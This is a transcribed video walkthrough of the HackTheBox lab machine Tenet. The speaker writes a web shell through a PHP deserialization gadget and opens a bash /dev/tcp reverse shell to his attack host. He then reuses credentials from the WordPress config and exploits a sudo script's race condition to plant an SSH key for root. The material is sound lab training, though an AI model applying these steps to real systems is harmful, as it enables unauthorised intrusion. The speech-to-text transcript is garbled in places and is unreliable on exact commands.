HackTheBox - Tenet
Key Takeaways
The video demonstrates a cybersecurity tutorial on HackTheBox - Tenet, covering topics such as web security, exploitation, and bash scripting, using tools like nmap, go buster, and wp scan. The tutorial highlights the importance of security basics, AI security, and defensive AI in preventing and mitigating cyber threats.
Full Transcript
what's going on youtube this is ipsec i'm doing tenant from hack the box which was on the easier side of media machines it starts off with finding a wordpress site and doing some light enumeration around wordpress you don't really find anything too interesting there there's no like vulnerable plugins nothing to really brute force you just have two usernames and some comments on the site reading one of the comments hints at a file satour.php existing on the server as well as a backup for it so you find the back of that file and discover satori.php is just a poorly written php script that for some reason uses serialization to move a file so you create a custom php deserialization gadget to exploit that and get a shell on the box with a shell you can enumerate the wordpress config find out the wordpress password is the password of one of the local users on the box kneel log in as neil and see he can sudo and run a bash script which has a race vulnerability that allows you to write a ssh key now we're gonna do this exploit two different ways we're gonna first brute force and just write all the files and eventually just win that race and the second one we're going to do it a more elegant way and use inertify to create a hook in the file system to notify us when files are created and then upon file creation trigger or right so with all that being said let's jump in as always we start with the nmap so dash sc for default scripts sv enumerate versions oh a output all formats put in the nmap directory and then we'll call it tenant and then the ip address of 101010223 i'm also going to add dash v so it shows me open ports as it finds them and right off the bat we have 22 and 80. so i'm going to go to 101010.223 and we see it's just the apache to default page i'm going to specify like robots.txt to see if we have anything here and we don't so the next thing i want to do is just see if there's like a php file so i'm going to do index.html to confirm that's this page we can try dot php and we don't see anything so the next thing i'm going to do is run a go buster so i'm going to do go buster dir for diy mode dash u for url http 101010223 uh dash w for word list up set list uh then we want to do discovery web content raft small words and we want to specify out file of gobuster.out and i didn't specify actually small words dot text and i didn't specify any extensions because i don't know what type of web server this is if i knew it was a php thing i tried the extension of php and if this comes up with nothing i may try extensions of like txt and pdf things like that but we do get a hit right off the bat saying it is wordpress so let's go to 101010223 slash wordpress and we don't really have anything here we do have recent comments and posts and things but it doesn't look like a wordpress page and that's because wordpress likes doing absolute urls everywhere so we can see it's trying to link to tenet.htb which doesn't exist we have to create that in our host file so let's do sudo vi etsy host and then we can do 10 10 10 223 tenet.htb and now when we view the source we get a page so now if we go to tenant.htb we should see the wordpress page so going here we do now get a pretty page going to the bottom we can see proudly powered by wordpress we can also go to um wp-admin and try like admin admin to log in uh the other thing we could do um i like checking like wp dash um is it content and seeing if there's index.html files here or something blocking it if directory traversal is on in wordpress or if there's no like index file in these directories you can just enumerate wordpress really easily by going like wp content plugins and then looking at all the files here but it looks like they have an index file so we can't see these directory listings so to enumerate this i'm going to use wp scan so wp scan dash h we want to do dash dash url uh the detection mode i like doing as aggressive it's going to make this take longer but i find it to be a lot more reliable um the passive mode is going to try to crawl the wordpress page look at the source code and enumerate plugins that way whereas aggressive is just going to go to wp content plugins and then the plugin name and see if that returns something so uh maybe ascii matt is a normal plug-in um i forget the normal plug-ins that it can check but if it gets 404 obviously there's no plug in there if it gets something then there is a plug-in so that's why i like aggressive mode and the last flag i normally do is the enumerate option and i always do all plugins you could just do vulnerable plugins but if you've ever looked at just wordpress plugins in general you can get a lot of cves to your name because there's just a lot of plugins and not many researchers looking at them so you may find a plug-in that's installed that has easy vulnerabilities you can find so i just like doing all plug-ins so let's do wp-scan dash dash url http dash w for word list or not w dash e to enumerate all plugins and then we can do plugins dash detection aggressive and then i always like saving to out file so wpscan.out and we'll let that go um we can do some manual enumeration of wordpress if we wanted to so for example um let's do hdb if we open up a post we can see the authors so we can get user names potentially of wordpress we can also enumerate this so if you use this pretty like your url rewrite of slash author slash name you can't really do anything but all that is doing is it's a wrapper around this author parameter on index.php and with this we can specify ids so numbers are much easier to guess or brute force than full names so author equals one and it's going to redirect us to slash author slash protagonist so if i just do this curl request curl 10 10 10 2 2 3 slash question mark author equals one uh what maybe i need dash capital i to do a header oh uh it's virtual hurst we have to specify tenant.htb and not the actual ip address so curl tenet.htb slash author equals one maybe dash capital i so we can see the header we can see location and that directs us here so we can quickly go through this and see if it links us anywhere and we don't have any other authors there are two users on this box if you remember when we just hit this without um the host name we saw comments and we saw a user called neil so if we go all these post we can see there is this comment and the reason why he's not showing up is he doesn't have a blog post this author thing only works if the person had a blog post if they don't you don't get them so this page just shows all the posts by user and we can see him saying did you remove the satori.php file and backup the migration program is incomplete why would you do this so the very first thing i want to do is just check if sator.php exists and we get a 404 not found and i'm going to do 101010223 and we get a 200 okay so it doesn't exist in wordpress so if we go to tennis.htb we get directed in this directory but if we just do 10 10 10 2 2 3 we get directed here which is one directory up and that's where um the satori.php file lives and we can see grabbing users from text file database updated if we go through all these posts let's go tenet.htb and read them so they're coming soon watch the space so nothing really there they're moving the data to a flat file structure to something a bit more substantial please bear with us and this is where the person commented saying you did you remove this file i don't know why he's asking did you remove it he can just check we checked but yeah and then we have looking for beta testers for new time management software rotus uh which is just a saturday backwards we'll hopefully be the market late qa whatever so we have the satori.php file and the comment said did you remove it and its backup so generally how i search for backups now is i just like using gobuster so if i do vi words uh we can just do sattor just do this and i'm gonna do go buster dir and we can do dash h and if we look uh discovery is d discover backup and this is something i put in uh to go buster if we go to ipsec dot rocks uh let's see go buster discover i think we did it in uh player yeah so if you want to see how we edited the code to add this into go buster it's the player video so i think so um discover directories yeah so what this is going to do is a lot of permutations on backups so most things will just like add back dot php to things like that to it but this will prepend something so if it takes word it may add period then dot swb uh p to look for vim swap files so that's what i'm going to do with this so go buster der dash u for url http 101010223 dash w for word list and we can just say words and then dash d for discover mode and we have to do dash x for php because our words only has satora not sattor.php and we can see it has discovered saturday.php and satra.php.back so if we go take a look at the dot back we can save it and then move download saturday php back we can see what it's doing um i'm not exactly sure what the purpose of this is other than to be vulnerable but we have a class that is taking the user file users.txt no data and then updating the database and then we have this destruct gadget of file put contents and then it's just calling updatedb um why they didn't just do like an f open and f right no idea that would have been much more secure like there's no reason to do sealization around here but let's go and if you don't know about php serialization again go to ipsec.rocks type in php serial and we can have advanced php and introduction to php deserialization here so this is a relatively simple one i'm just going to less this so i can copy uh we just want to copy this i believe uh we can copy this line so i'm going to do vi pwn.php and then we just do pwn is equal to new database export so we um create a new object of this and we just echo then serialize phone so if i php pwn.php we have a serialized object now we can put anything we want so our file name we're going to create ip.php and the data is just going to be question mark php system and then we can do request cmd we already use single quotes like that so we have this which is a serialized object going back to the um backup we can see what it's going to do so input is equal to get a repel and if a reaper is not set it's going to do nothing so input is nothing if this variable's not set database update is equal to unserialized input and this is where we're going to do the vulnerability we put our object here which is going to be the database export and we're going to specify the username and data and then when this object gets terminated or destructed it's going to call this function and it's going to probably get destroyed right after this call right here and it's going to file put contents user file which we called ip.php and this data is going to be the contents which we put a php shell so all we have to do is copy this so if we copy and then we go to let's see where is the backup satchel.php we can say a repo is equal to this object and it did a second database updated line and if we just curl 10 10 10 2 2 3 slash if dot php we don't get uh 404. if we tried does not exist we have curl responding with 404 but nothing here i can do cmd equals id and that did not work uh 101010223 if dot php and then question mark cmd equals who am i so we have an error in our code so let's go v pwn.php so let's see php system and then r-e-q-u-e-s-t cmd that should work one two terminate wait oh i have an extra parentheses so let's do this again so copy and then 101010223 satchel.php a repo is equal to the new object refresh this page and we have command execution now if i did not spot that by eye what i would have done to troubleshoot this is i put this in a file so let's do make do dub dub dub and go into this v shell.php paste i'm going to put this error message back in and then php dash capital s 12701 colon 80 i think uh sudo and now i have a php web server standing on my box so if we go to 12701 it's not found we called it shell.php and we can see the error message unexpected um parenthesis so that's how i would have troubleshooted that if i didn't spot it by i so let's go back here we have cmd equals who am i so i'm gonna do bash dash i actually we can type over a shell here bash dash c bash dash i dev tcp 10 10 14 2 port 9001 and 0 at and 1 like that and this should be good for a reverse shell syntax so copy and see lvmp 9001 paste this here and we don't get a callback so again i'm just going to run this here and we get a shell so what is happening here probably is some type of url encoding so i'm going to open up burp suite and we're just going to throw it into repeater so we don't have any like chance of it doing url encoding and i'm actually going to convert this into a post request because there's less bad characters in a pairs request so if i do proxy intercept is on we can go repeater rip suite cmd like that and then send this over we can paste this i can highlight this and do control u to see if it would work if i just url encode it and burp so if we do this send we get a shell so it's some type of url encoding a browser is doing i'm not sure what it is but if we just manually do it in burp it works so we have a shell i'm going to do uh control z actually fg first we have to do python3 dash c import pty pty dot spawn bin bash and then ctrl z stty raw minus echo fg enter enter you won't see yourself typing but it won't be typing you just have to trust and we have shell on this box so the very first thing i like doing is going into the web configuration and pulling the database password so wpconfig.php and we could let's see where is it so name is wordpress user is neil and password is opera2112 so we could do my sequel dash u uh neil i think it's like that dash p paste the password show databases i think it was wordpress yeah use wordpress and enumerate the database manually so we can do show tables select star from wp users we could just do select id user login and user pass from wp users um and try to crack this with hashcat the other thing we could do is just try sshinging with the credential so ssh neil at 10 10 10 2 2 3 yes and paste the password so we get in you could also probably try logging into wordpress with that so if we do tenet.htb wp admin and then what is it neil it's probably on burp suite so turn off uh neil paste is it so that's not his wordpress password so we could try cracking those but we already got um ssh with him so doing sudo-l we can see he can run this program enable ssh.sh with sudo so what i'm going to do is just clear that session out and let's take a look at enable ssh so this is running as root and we have a function check added check file add key and add key is going to make a directory uh as well make a file ssh dash um random string that's going to touch that file okay so here it generates a um slash sh dash random eight characters let's say that's gonna set umask110 which means it's going to um [Music] make all the every new file the permission is going to be 667 because umass is a inverse so you just take 777 and subtract it here so this should be 667 permissions uh we'll have to verify that when it gets created it's going to echo key into temp name and type name is going to be this and key is going to be this that's going to run check file and then if it is a valid key i'm guessing it's going to cat it into roots ssh authorized keys so if we look at what check file is just make sure the file exists so there is a race condition here when this file gets created and then this check file command is being ran if we replace the contents of this file then it will go into this authorized key so we can do that two different ways uh one way is just through shear brute force which we'll do first so i'm going to go into the temp directory and we're just going to write a loop so vi root.sh and we can say while true do so this is just an infinite loop and we can say for file in ls do so it's going to keep running this ls command and loop through every file and that would be the name and we can say if then file is equal to ssh so if it begins with ssh that's our thing then echo we want to put something into that file which is a key so i'm going to do ssh keygen dash f uh we'll go just call it tenant cat id or tenet.pub we just want to print our ssh key here so echo key to file and then we end the if then and that and end that loop so all this is doing is running ls and slash temp and if the file ever begins with ssh then it's going to overwrite that so let's do bash well first we have to have two sessions so i'm just going to run tmux here and we'll have a nested tmux session so i can do ssh or not sh um brute dot sh and then we can run sudo enable ssh.s and error adding root at ubuntu to authorized key file successfully added so it is a race condition so sometimes it may not work but looks like that time it did let's now try to sh so chmod uh 700 tenant so we gotta change the permissions of this private key sh-i tenet root at 10 10 10 2 2 3. it's taking its sweet time and we get in so that is a very like sloppy way to do this um there is a much better way and that's through using ineotify so by that i mean like hooking into the file system of linux and being notified when there's a change which is better because you don't have to constantly loop over the directory doing an ls waiting for a file to be created you just hook the file system and say hey notify me upon new files so you could do this through python but the python needs to have like the i notify bindings or libraries installed and it doesn't so we're going to do it the like quote unquote hardaway and just do it through a c program so i'm just going to go over to google and do c i notify if i can type example and let's see there's probably a good post i'm gonna check these two sites this one explains a lot but i didn't like this example because it wasn't um doing a forever loop it just does it upon one event i think this one does it a bit better yep so i like this one better so we're going to grab this source walk through it a little bit i'm sure if you read this post it'll make more sense but for video sake we're just going to go over it so let's v uh let's call this um parent.c and then set paste and paste this code so we're just doing a standard like libraries that we're including i'm going to collect up to 1024 events whatever so this sig handler is just watching us for like control c to see when the program closes and when it closes it's going to do i notify remove watch and the file descriptor and watch descriptor so it's just going to close it and exit gracefully so our program let's see care path to be watched and then we're going to start the signal handler so we can see when the program closes and path to be watched is going to be the very first argument so when we execute this we just put slash temp then we initialize inertify that's going to be file descriptor it's checking for errors right here then we're adding the watch so wd i notify watch and then saying and modify and create and and delete and these variables are populated by one of these headers probably the i notified.h let's check that real quick locate says inotify.h where is this it's probably like user yeah include cis like this and what was it uh we're looking at um let's just search for it in modify and we can see all the things we can potentially do access modify attribute close right close without a right just to close open moved from move to move create delete delete self and this so all these are actions we can hook into the main one we just want is uh create and they've already done that code for us so let's just go back to the code here and we can see what is happening uh right here is where they add the watch again we could delete modify and delete but if we did we'd probably have to delete some code down here so i'm going to leave it we have watch descriptor negative one so this is just checking for errors if there is no error say it's going to be watching the directory and then we have a infinite loop while one so this is just going to keep the program open uh into i equals zero and length care buffer this is going to read so anytime we get data and while the length is greater than i am guessing this means we have an event then we're going to process the event and if the event is in create doesn't look like we're oh if it is a create event then we're going to check if it is a directory and say a directory was created and if it wasn't a directory then we're going to say a file was created and that is pretty much all we want to do and we can see here it's just going to um increase the event size thing but right here is not there right here is where the file is created so let's go here and i probably should do spaces and we're going to have this right to the file so to do that we have to create the pointer so i'm going to do fptr for file pointer and oh man this is why is vim not doing this for me uh care full name and actually yeah i'm gonna do this real quick is equal to slash temp slash because that's where we want to create the file this event thing is only going to have the file name it's not going to have the directory it came from so i'm doing this so we could have that we probably could pull it from the um let's see was it path to be watched variable but that may not be end with a slash so i'm just going to be lazy and hardcode this um and then we have to combine the event name and full name so i'm going to do strcat full name and then we'll do event name like that and that should combine the two so all we have to do now is write to a file so file pointer is equal to f open full name and then we're going to open it in write mode which will just erase the file and put our contents if we did like wa for append we wouldn't uh erase the contents but for this we don't want to have anything in the file except what we want so to write to it we're gonna do f print f and then foul pointer which is gonna be the file and then we need our ssh key and i'll put that in after and then the final piece we just wanna close so i've closed file pointer so if all goes well we will be able to drop our key here and i'm not going to actually put the key because if we did um we wouldn't know it worked because we already have our ssh key there i can just um go out of here and do that sh-i tenet root at 10 10 10 2 2 3 because we've already exploited it once uh what was that the ip ping tenet.htb so maybe um the key got erased maybe there's a crown to clean up so let's cat tenet.pub and we'll put our key there to see if this works hopefully like i think it blocked somehow or something but we can put our ssh key backslash n and then gcc to compile dash o we'll call it pwn let's see um it's just telling us it included string.h for us because we used sdrcat and that should be fine do we have phone we do so i'm going to move phone into dub dub dub and we'll go here and do python3 dash m http server and then let's see where is our tenant shell right here so from here we can do w get 10 10 14 2 8 000 pound and then if we run pawn ch mod plus x pwn dot slash phone uh we have to specify slash temp so we are watching temp so if i do sudo enable ssh uh i think our c code is bad uh we got a segfault we created the file uh it's successfully added so i wonder if it wrote let's try this root yeah it worked um i'm not sure exactly where a code failed though uh v dot dot slash can i see it real quick pwn.c let's see f close file was created so we're creating the pointer i'm not sure exactly maybe it's maybe we have to delete the pointer let's try running that again real quick yeah it's segfaults every time so i guess let's just recompile it and test please subscribe real quick so please subscribe like that gcc pwn dash o pwn let's down this again run w get chmod plus x tone dot one slash temp enable so we seg faulted but that is fine we had kind of expected that because all we want to do is look at the authorized key file and see if please subscribe is there and it is so we have confirmed we are indeed exploiting this with ineotify so hope you enjoyed that and i guess the very last piece i want to do is verify that umass setting so let's do which enable ssh it's in here so we can vi this file and i'm going to get rid of this rm so now when we call enable ssh it's going to leave the file and temp and we'll see if it's 667. so if we do ls let's see ssh um i think xero and umass may not be able to do a read write execute so it may just be 666 well it is 666 but if i stat ssh we should be able to see yeah 666. if i touch ipsec then stat ipsec we can see it is six four four so the u mask here would be one two or one three three probably so if i do umass or zero two two um so zero so it's six and then two two so it's going from six so if i change this to umass zero or let's do one two three so now my umass is one two three and i touch f2 and we stat f2 you can see huh umass is not working as i expected in my head so it's probably because it can't give execute but i'm gonna stop explaining umass because um i obviously was not ready to do this off without my head something so basic but you can um really mess up so we see one two four that is six four and two so i'm guessing it's going from six six no yeah it just can't have the execute bit set and i can't do the math in my head to explain it well so if you want to know more about umass um definitely just probably do man you mask and of course the entry is not there is it on my box man umass there we go read the man page this is better explaining things than me so hope you guys enjoyed the video take care and i will see you all next week
Original Description
00:00 - Intro
01:20 - Start of nmap
03:00 - Discovering wordpress, fixing our host file
04:20 - Running wpscan to enumerate wordpress via aggressive mode
06:10 - Manually enumerating wordpress users by listing blog posts by author
08:30 - Discovering Sator.php, then using GoBuster to discover hidden backups to find Sator.php.bak
11:40 - Start of looking at the php source to see its a basic deserialization challenge.
12:40 - Building the deserialization gadget to write a file
15:15 - Uh oh. Made a typo, thankfully can find it quickly and get RCE
16:24 - Going back a step and showing a proper way to troubleshoot it
18:30 - Getting a reverse shell then examining wordpress config to get some credentials
20:15 - Testing the credentials with SSH and logging in with neil
21:00 - Discovering Neil can run enableSSH.sh with sudo, which has a race condition
23:00 - Writing a bash loop to exploit the race condition
25:20 - Exploiting the race condition more elegantly by using inotify to be notified when files are created
26:00 - Googling for an example written in C
27:00 - Going over the program
30:12 - Modifying the code to write a file upon discovering create
35:10 - Think i forgot to free th pointer, so it segfaults. Writing PleaseSubscribe to prove it worked.
Watch on YouTube ↗
(saves to browser)
Sign in to unlock AI tutor explanation · ⚡30
Playlist
Uploads from IppSec · IppSec · 0 of 60
← Previous
Next →
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
HHC2016 - Analytics
IppSec
HackTheBox - October
IppSec
HackTheBox - Arctic
IppSec
HackTheBox - Brainfuck
IppSec
HackTheBox - Bank
IppSec
HackTheBox - Joker
IppSec
HackTheBox - Lazy
IppSec
Camp CTF 2015 - Bitterman
IppSec
HackTheBox - Devel
IppSec
Reversing Malicious Office Document (Macro) Emotet(?)
IppSec
HackTheBox - Granny and Grandpa
IppSec
HackTheBox - Pivoting Update: Granny and Grandpa
IppSec
HackTheBox - Optimum
IppSec
HackTheBox - Charon
IppSec
HackTheBox - Sneaky
IppSec
HackTheBox - Holiday
IppSec
HackTheBox - Europa
IppSec
Introduction to tmux
IppSec
HackTheBox - Blocky
IppSec
HackTheBox - Nineveh
IppSec
HackTheBox - Jail
IppSec
HackTheBox - Blue
IppSec
HackTheBox - Calamity
IppSec
HackTheBox - Shrek
IppSec
HackTheBox - Mirai
IppSec
HackTheBox - Shocker
IppSec
HackTheBox - Mantis
IppSec
HackTheBox - Node
IppSec
HackTheBox - Kotarak
IppSec
HackTheBox - Enterprise
IppSec
HackTheBox - Sense
IppSec
HackTheBox - Minion
IppSec
VulnHub - Sokar
IppSec
VulnHub - Pinkys Palace v2
IppSec
HackTheBox - Inception
IppSec
Vulnhub - Trollcave 1.2
IppSec
HackTheBox - Ariekei
IppSec
HackTheBox - Flux Capacitor
IppSec
HackTheBox - Jeeves
IppSec
HackTheBox - Tally
IppSec
HackTheBox - CrimeStoppers
IppSec
HackTheBox - Fulcrum
IppSec
HackTheBox - Chatterbox
IppSec
HackTheBox - Falafel
IppSec
How To Create Empire Modules
IppSec
HackTheBox - Nightmare
IppSec
HackTheBox - Nightmarev2 - Speed Run/Unintended Solutions
IppSec
HackTheBox - Bart
IppSec
HackTheBox - Aragog
IppSec
HackTheBox - Valentine
IppSec
HackTheBox - Silo
IppSec
HackTheBox - Rabbit
IppSec
HackTheBox - Celestial
IppSec
HackTheBox - Stratosphere
IppSec
HackTheBox - Poison
IppSec
HackTheBox - Canape
IppSec
HackTheBox - Olympus
IppSec
HackTheBox - Sunday
IppSec
HackTheBox - Fighter
IppSec
HackTheBox - Bounty
IppSec
More on: Security Basics
View skill →Related Reads
Chapters (19)
Intro
1:20
Start of nmap
3:00
Discovering wordpress, fixing our host file
4:20
Running wpscan to enumerate wordpress via aggressive mode
6:10
Manually enumerating wordpress users by listing blog posts by author
8:30
Discovering Sator.php, then using GoBuster to discover hidden backups to find
11:40
Start of looking at the php source to see its a basic deserialization challeng
12:40
Building the deserialization gadget to write a file
15:15
Uh oh. Made a typo, thankfully can find it quickly and get RCE
16:24
Going back a step and showing a proper way to troubleshoot it
18:30
Getting a reverse shell then examining wordpress config to get some credential
20:15
Testing the credentials with SSH and logging in with neil
21:00
Discovering Neil can run enableSSH.sh with sudo, which has a race condition
23:00
Writing a bash loop to exploit the race condition
25:20
Exploiting the race condition more elegantly by using inotify to be notified w
26:00
Googling for an example written in C
27:00
Going over the program
30:12
Modifying the code to write a file upon discovering create
35:10
Think i forgot to free th pointer, so it segfaults. Writing PleaseSubscribe t
🎓
Tutor Explanation
DeepCamp AI